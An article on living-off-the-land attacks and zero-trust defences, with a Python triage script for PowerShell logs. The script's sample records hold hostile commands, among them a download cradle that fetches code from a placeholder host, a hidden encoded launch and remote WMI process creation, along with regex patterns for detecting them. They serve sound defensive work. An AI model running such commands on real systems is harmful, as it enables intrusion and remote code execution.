Your IT stack is the enemy: How 84% of attacks evade detection by turning trusted tools against you
In the early hours of a Sunday morning in Los Angeles, a leading financial services firm on the West Coast is under attack. A nation-state cyberattack squad has launched a living-off-the-land (LOTL) attack, targeting the firm’s pricing, trading, and valuation algorithms for cryptocurrency gain. Using common tools, the attackers have infiltrated the firm’s infrastructure and are slowly manipulating it for their own purposes.
According to CrowdStrike’s 2025 Global Threat Report, nearly 80% of modern attacks, including those in finance, are now malware-free. Attackers are exploiting valid credentials, remote monitoring tools, and administrative utilities with breakout times sometimes less than a minute. These tactics make it difficult for security teams to detect the ongoing attack.
The rise in credential theft, business email compromise, and zero-day vulnerabilities has created an ideal environment for LOTL attacks to thrive. Bitdefender’s recent research shows that 84% of modern attacks use LOTL techniques to bypass traditional detection systems. Attackers are exfiltrating sensitive data within the first hour of compromise in nearly 1 in 5 cases.
LOTL-based tactics have become the primary method for cyber intrusions, with advanced persistent threats (APTs) remaining undetected for weeks or months before data is stolen, as highlighted in IBM’s X-Force 2025 Threat Intelligence Index. The financial consequences of these attacks are significant, with the average cost of ransomware-related downtime reaching $1.7 million per incident.
Attackers are exploiting commonly used tools like PowerShell, Windows Management Instrumentation (WMI), and Remote Desktop Protocol (RDP) to evade detection and persist inside enterprises. Because these tools are legitimate and already present on the systems they touch, their use leaves no obvious malicious footprint, making it challenging for security teams to separate attacker activity from routine administration.
Adversaries using LOTL techniques are patient and blend into the background, using administrative and remote management tools that security teams rely on. Instead of using malware and attention-grabbing exploits, attackers are logging in with existing credentials and tools, making it difficult to distinguish their activity from legitimate operations.
Defenders must take ownership of their technology stack and adopt a zero-trust approach to security. Constant vigilance, an understanding of their attack surface, and a focus on what is truly out of place in their environment are critical steps in combating LOTL attacks, and organizations must treat cybersecurity as a core value rather than an afterthought. The NIST Zero Trust Architecture (SP 800-207) serves as a comprehensive organizational backbone and playbook for tackling lateral movement and LOTL attacks head-on, which have become increasingly common and sophisticated.
Here are some key strategies that organizations can implement using the principles outlined in the NIST Zero Trust Architecture:
Limit privileges on all accounts and delete long-standing accounts for contractors that haven’t been used in years: By applying least-privilege access across all admin and user accounts, organizations can prevent attackers from escalating their privileges and gaining unauthorized access to sensitive data.
Enforce microsegmentation: Dividing the network into secure zones helps confine attackers, limit their movement within the network, and reduce the impact of any potential security breaches.
Harden tool access and audit who is using them: Organizations should restrict, monitor, and log the use of tools such as PowerShell and WMI to prevent malicious actors from exploiting them. Additionally, implementing code signing, constrained language modes, and limiting access to trusted personnel can help enhance security.
Adopt NIST zero trust principles: Continuous verification of identity, device hygiene, and access context is essential for implementing adaptive trust as the default mode of operation, as outlined in SP 800-207.
Centralize behavioral analytics and logging: Extended monitoring can help organizations detect and flag unusual activities before they escalate into full-blown security incidents.
Deploy adaptive detection: Organizations whose existing platforms can scale to provide adaptive detection at minimal additional cost should leverage those EDR/XDR capabilities to proactively hunt for suspicious patterns and activities.
Red team regularly: Conducting simulated attacks can help organizations test their defenses and identify potential vulnerabilities that malicious actors could exploit. This proactive approach can help organizations stay one step ahead of cyber threats.
Elevate security awareness: Training users and administrators on LOTL attack methods, social engineering tactics, and indicators of compromise is essential for building a strong security culture within the organization.
Update and inventory: Maintaining up-to-date application inventories, patching known vulnerabilities, and conducting regular security audits are critical for identifying and addressing potential security gaps.
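As an added illustration of the tool-auditing and centralized-logging strategies above (this is not code from the article or from any vendor it names), the Python below scores constructed PowerShell script block log records against a few coarse LOTL indicators plus a hypothetical per-host allow-list of expected PowerShell users, and decodes any -EncodedCommand payload so an analyst can see what was actually run:

```python
import base64
import re

# Constructed sample records, loosely shaped like Windows PowerShell
# script block logging (Event ID 4104). Not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "user": "CORP\\svc_backup", "host": "FS01", "script": "Get-ChildItem D:\\backups | Measure-Object"},
    {"id": 2, "user": "CORP\\jdoe", "host": "WS-0423", "script": "powershell -nop -w hidden -EncodedCommand QQBCAEMA"},
    {"id": 3, "user": "CORP\\jdoe", "host": "WS-0423", "script": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"},
    {"id": 4, "user": "CORP\\helpdesk", "host": "DC01", "script": "Invoke-WmiMethod -Class Win32_Process -Name Create -ComputerName FS01 -ArgumentList 'cmd /c whoami'"},
    {"id": 5, "user": "CORP\\itadmin", "host": "DC01", "script": "Get-Service | Where-Object Status -eq 'Stopped'"},
]
# Hypothetical allow-list: who is expected to run PowerShell on each server.
APPROVED_POWERSHELL_USERS = {"DC01": {"CORP\\itadmin"}, "FS01": {"CORP\\svc_backup"}}

# (name, pattern, weight). Coarse on purpose; tune against your own baseline before alerting.
RULES = [
    ("encoded_command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}", re.I), 3),
    ("download_cradle", re.compile(r"(IEX|Invoke-Expression).*(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b)", re.I), 4),
    ("hidden_or_bypass", re.compile(r"-w(indowstyle)?\s+hidden|-(ep|ExecutionPolicy)\s+bypass", re.I), 2),
    ("remote_wmi_process", re.compile(r"Invoke-(Wmi|Cim)Method.*Win32_Process.*(Create|ComputerName)", re.I), 4),
]

def decode_encoded(script):
    """Return the -EncodedCommand payload decoded from UTF-16LE, or None."""
    m = RULES[0][1].search(script)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(0).split()[-1]).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(events, approved_users):
    """Score each record; return [(id, score, reasons)] with the highest score first."""
    findings = []
    for ev in events:
        score, reasons = 0, []
        for name, rx, weight in RULES:
            if rx.search(ev["script"]):
                score += weight
                reasons.append(name)
        # Context check: a known server with a PowerShell user nobody expects there.
        allowed = approved_users.get(ev["host"])
        if allowed is not None and ev["user"] not in allowed:
            score += 2
            reasons.append("user_not_approved_for_host")
        decoded = decode_encoded(ev["script"])
        if decoded:
            reasons.append(f"decoded={decoded!r}")
        if score:
            findings.append((ev["id"], score, reasons))
    return sorted(findings, key=lambda f: -f[1])
```

Records that trip no rule and come from an approved user never appear in the output, which is the point: the signal is what is out of place, not PowerShell use as such.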
In conclusion, organizations must adopt a proactive and comprehensive approach to cybersecurity to defend against the growing threat of LOTL attacks. By following the guidelines outlined in the NIST Zero Trust Architecture and implementing the strategies mentioned above, organizations can strengthen their security posture and protect their valuable assets from malicious actors.